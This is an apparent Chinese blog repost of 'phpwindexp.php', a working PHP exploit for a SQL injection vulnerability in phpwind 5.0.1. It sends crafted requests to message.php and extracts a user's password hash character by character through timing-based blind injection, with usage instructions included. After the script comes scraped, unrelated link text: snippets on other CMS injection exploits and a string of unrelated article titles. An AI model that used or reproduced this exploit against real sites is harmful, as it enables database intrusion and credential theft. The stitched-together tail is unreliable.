来源:寒水芊芊's blog

print_r("

+------------------------------------------------------------------+

phpwind 5.0.1 Sql注射漏洞利用程序

By loveshell[at]0x27.com

欢迎访问 [http://www.0x27.com]

国内最专业最及时的web漏洞发放站点

用法: c:\php5\php.exe phpwindexp.php www.0x27.com /bbs/ 2

事先请修改下面的$cookie和$useragent项

Just For Fun :)

+------------------------------------------------------------------+

");

ini_set("max_execution_time",0);

error_reporting(7);

$bbspath="$argv[2]";

$server="$argv[1]";

$cookie='aa102_c_stamp=1173176226; aa102_lastfid=0; aa102_ol_offset=47369; aa102_ipstate=1173162314; aa102_sid=f902d0ad; aa102_online1=yes; aa102_ck_info=%2F%09; aa102_winduser=AgYAOVRWCQNTC1QAAw4AWlAABFFSUVYMVVVbAFQGVFIGVlAH; aa102_lastvisit=0%091173176226%09%2Findex.php%3F';

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)";

$uid=intval($argv[3])>0 ? intval($argv[3]):1;

echo "\r\n#Logging\t........";

if(islogin()) echo "Login Ok!\r\n";

else die("Not Login!\tCheck Your Cookie and Useragent!\r\n");

echo "#Testing\t........";

if(test()) echo "Vul!\r\n";

else die("Not Vul");

$hashtable='0123456789abcdef';

$count=0;

echo "#Cracking\t\r\n\r\n";

for($i=1;$i<=16;$i++){

echo "第\t$i\t位:";

$subpass=crack($i+8);

$password=$password.$subpass;

echo "$subpass\r\n";

}

echo "Password:\t$password";

echo "\r\nGood Luck $count Times\r\n";

function send($cmd,$path)

{

global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;

$path=$bbspath."$path";

$message = "POST ".$path." HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Referer: http://".$server.$path."\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: ".$useragent."\r\n";

$message .= "Host: ".$server."\r\n";

$message .= "Content-length: ".strlen($cmd)."\r\n";

$message .= "Connection: Keep-Alive\r\n";

$message .= "Cookie: ".$cookie."\r\n";

$message .= "\r\n";

$message .= $cmd."\r\n";

$count=$count+1;

$fd = fsockopen( $server, 80 );

fputs($fd,$message);

$resp = "";

while($fd&&!feof($fd)) {

$resp .= fread($fd,1024);

}

fclose($fd);

$resp .="";

if($debug) {echo $cmd;echo $resp;}

// echo $resp;

return $resp;

}

function sqlject($sql){

global $uid;

$data='action=pubmsg&readmsg=0)';

$data=$data." union select BENCHMARK(1000000,md5(12345)) from pw_members where uid=$uid and $sql".'/*';

$echo=send($data,'message.php');

preg_match("/Total (.*)\(/i",$echo,$matches);

if($matches[1]>2) return 1;

else return 0;

}

function test(){

global $uid;

$data='action=pubmsg&readmsg=0)';

$echo=send($data,'message.php');

if(strpos($echo,'MySQL Server Error')) return 1;

else return 0;

}

function islogin(){

global $uid;

$data='action=pubmsg&readmsg=0)';

$echo=send($data,'message.php');

if(strpos($echo,'login.php"')) return 0;

else return 1;

}

function crack($i){

global $hashtable;

$sql="mid(password,$i,1)>0x".bin2hex('8');

if(sqlject($sql)){

$a=8;

$b=15;}

else {

$a=0;

$b=8;

}

for($tmp=$a;$tmp<=$b;$tmp++){

$sql="mid(password,$i,1)=0x".bin2hex($hashtable[$tmp]);

if(sqlject($sql)) return $hashtable[$tmp];

}

crack($i);

}

?>

phpwindexp.php,phpwind 5.0.1 Sql注射漏洞利用程序脚本安全 -电脑资料相关推荐

  1. 完美时空客服自助平台SQL注射漏洞

    漏洞详情 披露状态: 2010-07-23: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...

  2. 联众世界论坛SQL注射漏洞

    漏洞详情 披露状态: 2010-07-23: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...

  3. 联众世界某网站SQL注射漏洞

    漏洞详情 披露状态: 2010-07-26: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...

  4. /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -

    DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...

  5. 正方教务系统新版php,正方教务系统最新sql注射漏洞修复 | CN-SEC 中文网

    摘要 你还再为考试挂科而烦恼么,你还再为大学里怎么要妹子电话而纠结么,你想快速找到学校里的漂亮妹子么,那么请看下文 1. 教室查询处有sql注射,如图 你还再为考试挂科而烦恼么,你还再为大学里怎么要妹 ...

  6. TP5 框架 SQL 执行流程分析及 5.0.9 SQL 注入漏洞分析

    文章目录 SQL查询流程 TP 5.0.9 SQL注入 修复 SQL查询流程 TP5手册:https://www.kancloud.cn/manual/thinkphp5/118044 在分析 tp5 ...

  7. metinfo小于v6.2.0版本SQL盲注利用脚本

    #coding=utf-8 import requests import re import sys import time#获取config_safe.php中的 key def getKey(ur ...

  8. SQL注入——SQL注入漏洞利用(零)(值得收藏)

    一.什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系 统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后 台数据库 ...

  9. flow.php 漏洞,Ecshop 3.0的flow.php文件SQL注射漏洞修复

    关于这个漏洞是ECSHOP2.7.3版本修复了.ecshop最新版本3.0也会犯这种低级的错误. elseif ($_REQUEST['step'] == 'repurchase') { includ ...

最新文章

  1. Swift Tips - 在 Swift 中自定义下标访问
  2. CentOS6.6配置iptables
  3. 让一个 csproj 项目指定多个开发框架
  4. 现代密码学4.1--消息完整性
  5. html 上传文件_【实战篇】记一次文件上传漏洞绕过
  6. linux修改进程优先级
  7. 这么简单的bug,你改了2天?
  8. java controller json_springMVC的controller层接收前端json数据
  9. 漫画:程序员战力图鉴
  10. silverlight开发无法调试问题
  11. 在QLabel上点击获得的效果
  12. 支持向量机中到底什么是支持向量
  13. DNS寻址以及IP解析
  14. js面向对象技术小结
  15. 使用8、14、20节点6面体的立方体弹性固体的三维分析(python,有限元)
  16. 解决手机不能设置DeviceOwner权限提示already provisioned问题
  17. HTML中如何自动切换页面背景图片
  18. Web工程师和设计师必须要知道的 iOS 8的十个变化
  19. docker 创建nacos-server standalone
  20. appinventor飞机大战案例_第一个AppInventor 开发案例 Hello Kitty(下)

热门文章

  1. 取得高等学校教师资格证应当具备什么学历要求
  2. linux修改mac地址
  3. 〖产品思维训练白宝书 - 核心竞争力篇①〗- 产品经理 的核心竞争力解读
  4. 小步快跑,快速迭代:安全运营的器术法道
  5. BVR电线与RV电线的区别有哪些?
  6. Git分支——多人协作开发
  7. java怎么写dnf辅助_易语言地下城与勇士辅助自动刷图类源码
  8. 技术人生的职场众生相
  9. 电脑回收站清空了怎么恢复回来
  10. 腾讯QQ修改密保手机